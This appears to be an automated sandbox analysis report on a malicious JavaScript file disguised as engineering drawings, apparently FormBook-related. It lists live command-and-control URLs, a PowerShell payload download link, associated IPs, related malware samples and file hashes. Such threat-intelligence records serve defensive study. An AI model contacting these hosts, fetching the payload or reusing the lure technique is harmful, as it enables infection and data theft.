                http://www.l63339.xyz/vhr7/?Cf=xxUlW2vX-dIPmnP0&CL=iaSfD1StI7hDT4qLPsiE2zQeJuTNjk7n7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4t0mW0LdNsZ/ysFr93T3fDTPWMGFwNTiC4gY=100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.l63339.xyz
                162.218.30.235
                truefalse
                  high
                  www.seasay.xyz
                  103.106.67.112
                  truefalse
                    high
                    files.catbox.moe
                    108.181.20.35
                    truefalse
                      high
                      zcdn.8383dns.com
                      134.122.135.48
                      truefalse
                        high
                        www.tumbetgirislinki.fit
                        104.21.32.1
                        truefalse
                          high
                          www.lucynoel6465.shop
                          104.21.48.1
                          truefalse
                            high
                            www.kjuw.party
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              http://www.seasay.xyz/c9ts/false
                                high
                                http://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4+2MinMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7RzM6wNjAHWVIo4recboKbaao8YnR4NtOnxQ=&Cf=xxUlW2vX-dIPmnP0true
                                • Avira URL Cloud: malware
                                unknown
                                http://www.tumbetgirislinki.fit/k566/?CL=RARW43WNMKajmHobqktuR6SSs++r69WXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe/M4SnSZZuBmldonFkNjvznFjfMe0yaUlTKw=&Cf=xxUlW2vX-dIPmnP0true
                                • Avira URL Cloud: phishing
                                unknown
                                http://www.kjuw.party/e0jv/false
                                  high
                                  https://files.catbox.moe/et18ob.ps1false
                                    high
                                    http://www.tumbetgirislinki.fit/k566/false
                                      high
                                      http://www.l63339.xyz/vhr7/?Cf=xxUlW2vX-dIPmnP0&CL=iaSfD1StI7hDT4qLPsiE2zQeJuTNjk7n7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4t0mW0LdNsZ/ysFr93T3fDTPWMGFwNTiC4gY=true
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.lucynoel6465.shop/jgkl/false
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabrunonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1741112479.000001CFCC52A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/ac/?q=runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://files.catbox.moe/et18ob.ps1Dwscript.exe, 00000000.00000003.1800210275.00000231388B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.kjuw.partyxBjKgBCuI1jq.exe, 0000000A.00000002.2975394799.00000000029C6000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    high
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.seasay.xyz/c9ts/?CL=b2h4705j/BXuiRKuOXJLA/Ych4xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003406000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://files.catbox.moe/wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ecosia.org/newtab/runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://files.catbox.moe/et18ob.ps1)wscript.exe, 00000000.00000003.1799104824.00000231369E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798911413.00000231369DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801563846.00000231369E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1741112479.000001CFCAFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/runonce.exe, 00000009.00000002.2976180128.0000000004F44000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003274000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2505034564.000000003A3C4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://files.catbox.moe;wscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://files.cawscript.exe, 00000000.00000002.1801684145.0000023136B9A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referrunonce.exe, 00000009.00000002.2976180128.0000000005268000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003598000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrunonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contoso.com/powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1741112479.000001CFCC52A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1778622855.000001CFDAE3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://oneget.orgXpowershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://files.catbox.moe/ewscript.exe, 00000000.00000003.1691274229.00000231386CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://aka.ms/pscore68powershell.exe, 00000001.00000002.1741112479.000001CFCADC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://files.catbox.moewscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1801585342.00000231369F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1798831358.00000231369F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1741112479.000001CFCADC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=runonce.exe, 00000009.00000002.2977845167.0000000007668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://files.catbox.moe/et18ob.ps1g2wscript.exe, 00000000.00000003.1687859855.0000023138681000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://oneget.orgpowershell.exe, 00000001.00000002.1741112479.000001CFCBFC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://files.catbox.moe/jwscript.exe, 00000000.00000002.1801873166.00000231390B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/runonce.exe, 00000009.00000002.2976180128.0000000004F44000.00000004.10000000.00040000.00000000.sdmp, xBjKgBCuI1jq.exe, 0000000A.00000002.2975872831.0000000003274000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2505034564.000000003A3C4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs
                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          104.21.48.1
                                                                                                          www.lucynoel6465.shopUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          103.106.67.112
                                                                                                          www.seasay.xyzNew Zealand
                                                                                                          56030VOYAGERNET-AS-APVoyagerInternetLtdNZfalse
                                                                                                          104.21.32.1
                                                                                                          www.tumbetgirislinki.fitUnited States
                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                          108.181.20.35
                                                                                                          files.catbox.moeCanada
                                                                                                          852ASN852CAfalse
                                                                                                          162.218.30.235
                                                                                                          www.l63339.xyzUnited States
                                                                                                          62587ANT-CLOUDUSfalse
                                                                                                          134.122.135.48
                                                                                                          zcdn.8383dns.comUnited States
                                                                                                          64050BCPL-SGBGPNETGlobalASNSGfalse
                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                          Analysis ID:1623349
                                                                                                          Start date and time:2025-02-25 07:25:14 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 8m 11s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:11
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:2
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • GSI enabled (Javascript)
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:Stormwater Works Drawings Spec.js
                                                                                                          Detection:MAL
                                                                                                          Classification:mal100.troj.spyw.expl.evad.winJS@12/8@6/6
                                                                                                          EGA Information:
                                                                                                          • Successful, ratio: 66.7%
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 89%
                                                                                                          • Number of executed functions: 78
                                                                                                          • Number of non-executed functions: 231
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .js
                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.60
                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 6304 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          TimeTypeDescription
                                                                                                          01:26:12API Interceptor4x Sleep call for process: powershell.exe modified
                                                                                                          01:27:36API Interceptor800410x Sleep call for process: runonce.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          104.21.48.1Shipment Delivery No DE0093002-PDF.exeGet hashmaliciousLokibotBrowse
                                                                                                          • touxzw.ir/tking3/five/fre.php
                                                                                                          Remittance_CT022024.exeGet hashmaliciousLokibotBrowse
                                                                                                          • touxzw.ir/fix/five/fre.php
                                                                                                          http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/Get hashmaliciousHTMLPhisherBrowse
                                                                                                          • microsoft-sharepoint4543464633.pages.dev/index-2jc93/
                                                                                                          install.exeGet hashmaliciousBabadedaBrowse
                                                                                                          • api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
                                                                                                          ZmK1CAc4VP.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.tumbetgirislinki.fit/4wrd/
                                                                                                          uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.lucynoel6465.shop/jgkl/
                                                                                                          QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.lucynoel6465.shop/am6a/
                                                                                                          LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • www.tumbetgirislinki.fit/k566/
                                                                                                          laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • www.lucynoel6465.shop/jgkl/?y2IHp=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpe8No0hPfAwO5oFY7qBV6wzFyOtp6qA==&iLy=Wfpx
                                                                                                          laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • www.tumbetgirislinki.fit/k566/
                                                                                                          103.106.67.112laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/c9ts/
                                                                                                          laser.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/c9ts/
                                                                                                          uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/c9ts/
                                                                                                          gH68ux6XtG.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/c9ts/
                                                                                                          Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/36xs/
                                                                                                          PO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/c9ts/
                                                                                                          PO from tpc Type 34.1 34,2 35 Spec 1.jsGet hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/c9ts/
                                                                                                          Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/40fw/
                                                                                                          LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • www.seasay.xyz/c9ts/
                                                                                                          ebu.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • www.antobloom.xyz/hzjg/
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          www.seasay.xyzlaser (2).ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          laser.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          gH68ux6XtG.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          PO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          PO from tpc Type 34.1 34,2 35 Spec 1.jsGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          files.catbox.moeSipari#U015f Sorgulama N#U00ba TM05-Q2-24-25.Vbs.vbsGet hashmaliciousRemcosBrowse
                                                                                                          • 108.181.20.35
                                                                                                          Purchase Inquiry.pdf.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                          • 108.181.20.35
                                                                                                          PURCHASE+ORDER....Vbs.vbsGet hashmaliciousUnknownBrowse
                                                                                                          • 108.181.20.35
                                                                                                          Purchase Order_pdf.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                          • 108.181.20.35
                                                                                                          DHL AWB Documents_pdf.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                          • 108.181.20.35
                                                                                                          s57VlxH5.batGet hashmaliciousQuasarBrowse
                                                                                                          • 108.181.20.35
                                                                                                          SDG9IrTB.batGet hashmaliciousQuasarBrowse
                                                                                                          • 108.181.20.35
                                                                                                          P.O & Specification Details.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 108.181.20.35
                                                                                                          P.O & Specification Details.jsGet hashmaliciousUnknownBrowse
                                                                                                          • 108.181.20.35
                                                                                                          SecuriteInfo.com.Trojan.DownLoaderNET.1116.23844.13605.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 108.181.20.39
                                                                                                          zcdn.8383dns.comRspot.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 134.122.135.48
                                                                                                          laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 134.122.135.48
                                                                                                          laser.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 134.122.133.80
                                                                                                          uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 134.122.133.80
                                                                                                          gH68ux6XtG.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 134.122.133.80
                                                                                                          LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 134.122.135.48
                                                                                                          laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 134.122.133.80
                                                                                                          laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 134.122.135.48
                                                                                                          PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                          • 134.122.133.80
                                                                                                          PURCHASE ORDER- OFFICE BUILDING SHAKHBOUT 202502.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                          • 134.122.135.48
                                                                                                          www.l63339.xyzlaser (2).ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          laser.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          gH68ux6XtG.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          PO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          PO from tpc Type 34.1 34,2 35 Spec 1.jsGet hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          laserl.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          PO 87877889X,pdf.Vbs.vbsGet hashmaliciousFormBookBrowse
                                                                                                          • 162.218.30.235
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUSnode.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 162.159.138.232
                                                                                                          arm.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 172.68.102.145
                                                                                                          bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.wks.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                          • 104.21.23.148
                                                                                                          CERENAK-8392.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                          • 104.21.112.1
                                                                                                          employee performance report.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 104.21.52.38
                                                                                                          PO.exeGet hashmaliciousLokibotBrowse
                                                                                                          • 104.21.96.1
                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.7122.15013.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          http://aptbusinessservices.com.au/Get hashmaliciousUnknownBrowse
                                                                                                          • 172.64.148.115
                                                                                                          https://brightenbooks.com.hk/trigger.php?r_link=https://auth.khs.co.com/kQR5EF2ST6CD1OP4mQR5CD1CD1MN3QR5YZ9OP4kwmOP4cWX8mGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 188.114.96.3
                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                          • 104.21.32.1
                                                                                                          ASN852CAjklmpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 64.180.234.184
                                                                                                          res.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 162.156.97.182
                                                                                                          res.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 199.126.186.80
                                                                                                          debug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                          • 207.102.160.248
                                                                                                          res.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 208.181.128.107
                                                                                                          res.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 199.126.116.124
                                                                                                          arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 75.152.119.170
                                                                                                          Sipari#U015f Sorgulama N#U00ba TM05-Q2-24-25.Vbs.vbsGet hashmaliciousRemcosBrowse
                                                                                                          • 108.181.20.35
                                                                                                          Purchase Inquiry.pdf.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                          • 108.181.20.35
                                                                                                          res.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 207.81.69.139
                                                                                                          VOYAGERNET-AS-APVoyagerInternetLtdNZjade.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 111.65.234.237
                                                                                                          laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          laser.ps1Get hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          gH68ux6XtG.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          PO from tpc Type 34.1 34,2 35 Spec.jsGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          PO from tpc Type 34.1 34,2 35 Spec 1.jsGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 103.106.67.112
                                                                                                          Hilix.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 111.65.234.221
                                                                                                          CLOUDFLARENETUSnode.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 162.159.138.232
                                                                                                          arm.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 172.68.102.145
                                                                                                          bdc2be5bddda548dec3c2d88464a698627ac9447aae621d8.wks.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                          • 104.21.23.148
                                                                                                          CERENAK-8392.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                          • 104.21.112.1
                                                                                                          employee performance report.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 104.21.52.38
                                                                                                          PO.exeGet hashmaliciousLokibotBrowse
                                                                                                          • 104.21.96.1
                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.7122.15013.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          http://aptbusinessservices.com.au/Get hashmaliciousUnknownBrowse
                                                                                                          • 172.64.148.115
                                                                                                          https://brightenbooks.com.hk/trigger.php?r_link=https://auth.khs.co.com/kQR5EF2ST6CD1OP4mQR5CD1CD1MN3QR5YZ9OP4kwmOP4cWX8mGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 188.114.96.3
                                                                                                          SecuriteInfo.com.Win32.DropperX-gen.18958.20206.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                          • 104.21.32.1
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          37f463bf4616ecd445d4a1937da06e19#U00e1raj#U00e1nlat#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                          • 108.181.20.35
                                                                                                          TPS_02_2025_JKTA89495500_PDF.jsGet hashmaliciousRemcosBrowse
                                                                                                          • 108.181.20.35
                                                                                                          Dokumen BPN [030951966215000AUTOMATION24971775911039.PDF.jsGet hashmaliciousRemcosBrowse
                                                                                                          • 108.181.20.35
                                                                                                          BANK SLIP_TT COPY_0300773456864-2-18-2024_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                          • 108.181.20.35
                                                                                                          build.exeGet hashmaliciousVidarBrowse
                                                                                                          • 108.181.20.35
                                                                                                          Quote-SA05537809567875351061-24_pdf.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                          • 108.181.20.35
                                                                                                          Minty.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 108.181.20.35
                                                                                                          random.exeGet hashmaliciousAmadey, LummaC Stealer, PureLog Stealer, Tofsee, Vidar, zgRATBrowse
                                                                                                          • 108.181.20.35
                                                                                                          Order sheet RFQ_202502224.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                          • 108.181.20.35
                                                                                                          No context
                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                          File Type:ASCII text, with very long lines (65428), with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):524560
                                                                                                          Entropy (8bit):5.993156572464636
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:2FT1LRcHcaR+mijUI/3lcNfQki/4YgqztwvP4jNJkara5HVWAYdoa4wAE38zKwU6:iJLYPAm2XvI8Pk5hYGa4wA00svwSDBk
                                                                                                          MD5:C7AB7996E73BD6FAB0B74517DF68B1E9
                                                                                                          SHA1:A2A342A9806525F5C16CD35A3D3291B9145EB64E
                                                                                                          SHA-256:073CA831F76EC5DE04073E71D5DC0B05E24324F89441A317311C7B8BE34939CF
                                                                                                          SHA-512:E81569DBC2CFDD13356F8991C13521AE85DAB2E245E4EF1AB48D50A4DC1E76874405081A627DAE631F6308FF488B5A6A2F5379E25BA9C3A71E4BE65373484B8E
                                                                                                          Malicious:true
                                                                                                          Reputation:low
